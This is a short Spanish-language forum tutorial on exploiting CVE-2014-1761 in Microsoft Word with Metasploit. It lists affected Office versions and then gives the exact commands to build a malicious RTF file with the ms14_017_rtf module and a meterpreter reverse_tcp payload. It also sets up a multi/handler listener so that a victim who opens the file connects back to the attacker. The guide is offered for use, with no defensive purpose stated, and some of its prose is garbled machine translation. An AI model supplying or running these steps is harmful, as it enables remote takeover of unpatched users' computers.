Bug de Word 2010/2013 (Explotando)







En este módulo se crea un archivo RTF malicioso que al abrirse en versiones vulnerables de Microsoft Word dará lugar a la ejecución de código. Existe la falla en la forma de un campo de recuento lista de invalidación puede ser modificada para tratar una estructura como la otra. Este error se consideró inicialmente la explotación en la partida salvaje en abril de 2014. Este módulo fue creado mediante la inversión de una muestra pública malware.

Microsoft Word 2003 Service Pack 3, 2007 SP3, 2010 SP1 y SP2, 2013, y 2013 RT; Word Viewer; Compatibilidad de Office Paquete SP3; Office 2011 para Mac; Word Automation Services en Server 2010 SP1 y SP2 y 2013 de SharePoint; Office Web Apps 2010 SP1 y SP2; y Office Web Apps Server 2013 permite a atacantes remotos ejecutar código arbitrario o causar una denegación de servicio (corrupción de memoria) a través de datos RTF artesanales.

Exploit

Cita:CVE-2014-1761


Atacante

Cita:kali linux
Metasploit


Victima

Cita:Windows 7 x86






Cita:use exploit/windows/fileformat/ms14_017_rtf






Cita:set payload windows/meterpreter/reverse_tcp
set lhost (IP)
exploit

Se crea un archivo (.rtf) malicioso,solo hay que abrirlo en la pc victima.




creamos una conexion de handler para que cuando abramos el archivo (.rtf) se conecte 
a la pc atacante,configuramos nuestros parametros.






Cita:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost (IP)
exploit

Abrimos el archivo ,Esperamos que conecte y nos da la sesión de meterpreter.